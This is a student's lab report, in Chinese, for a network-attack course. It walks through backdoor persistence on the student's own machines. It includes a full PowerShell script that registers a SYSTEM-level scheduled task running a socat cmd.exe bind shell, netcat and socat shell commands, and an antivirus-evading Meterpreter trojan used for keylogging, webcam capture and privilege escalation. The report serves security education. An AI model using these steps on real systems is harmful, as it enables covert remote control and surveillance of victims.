实践过程记录
使用netcat获取主机操作Shell,cron启动
ncat即Netcat,可以收发传输层数据,由攻击者使用。cron是Linux中用于按计划执行脚本的工具,在网络对抗中让受害者连接不稳定时,重连攻击者,由受害者启动。
既然如此,受害者需要是Linux,否则没有cron命令,我购买了一台阿里云Ubuntu服务器充当受害者。使用crontab -e
编辑如下计划:
这样,每天凌晨2点,受害者就会开放5555端口,等待攻击。
之后,内网中的kali正向连接公网服务器,获取shell权限。
使用socat获取主机操作Shell, 任务计划启动
socat可建立双向通道,支持众多协议和链接方式,可以看成ncat++,在linux中一般都支持该命令。
任务计划是windows中的任务形式,windows作为受害者,需要用socat接收kali传来的命令。
既然要进行网络通信,且为正向连接,就需要知道受害者的IP:
最下一行代表WLAN局域网的IP,为192.168.56.1。
之后,在windows中以管理员身份打开powershell ISE,编写脚本创建任务。
# 定义任务的触发器(例如,每天凌晨 2 点执行)
$trigger = New-ScheduledTaskTrigger -Daily -At 2am
# 定义任务的操作(例如,运行 PowerShell 脚本)
$action = New-ScheduledTaskAction -Execute "D:\socat\socat.exe" -Argument "tcp-listen:2217 exec:cmd.exe,pty,stderr"
# 定义任务的权限(可选,默认为当前用户)
$principal = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY\SYSTEM" -LogonType ServiceAccount
# 定义任务的设置(可选)
$settings = New-ScheduledTaskSettingsSet
# 注册新任务
$taskName = "lhq20212217exp2"
$taskDescription = "网络对抗实验二"
Register-ScheduledTask `
-TaskName $taskName `
-Action $action `
-Trigger $trigger `
-Principal $principal `
-Description $taskDescription `
-Settings $settings
为了加快实验进度,我使用管理员模式的powershell即刻执行了任务。
之后,在kali-wsl中使用socat - tcp:192.168.56.1:2217
即可获取windows的cmd权限。
使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
首先生成木马文件,通过socat传输到windows主机上:
windows主机接收文件到火绒信任区,避免误杀:
之后,在windows中运行该木马程序,返回Ubuntu,通过Ubuntu快速安装MSF - tomyyyyy - 博客园 (cnblogs.com)教程安装msfconsole,并连接木马
使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
本步骤需要在上一步基础上进行,中途不可退出。由于公网服务器没有图形界面,我使用了在线网页的形式下载音视频等窃取到的数据。
音频(record_mic)
输入record_mic
可截取1秒的音频。
截屏(screenshot)
输入screenshot
可截屏,图片以jpeg的形式保存起来
看起来并不是很清晰
拍照(webcam_snap)
输入webcam_snap
拍照,相比于截屏,照片就清晰多了:
录制键盘(keyscan_start,keyscan_dump)
使用keyscan_start
开始录制,接着用keyscan_dump
结束,我在这期间只按了一次Ctrl C。
提权(getuid,getsystem)
这一步要求使用管理员身份运行木马,之后在攻击机中先使用 getuid
指令查看当前用户,再使用 getsystem
指令进行提权。
不过在本次实验中,提权后仍然无法查看敏感信息。
使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
在MSF中通过-x file_path
参数可按指定文件模板生成木马,这次的木马与上次不同,需要在Linux上运行。
kali-WSL就是一台Linux,可以充当受害者,在kali-WSL中,通过wget下载公网上的lhq20212217_pwn_backdoor,并赋权执行:
之后,到Ubuntu攻击机中,使用MSF连接木马:
成功入侵Kali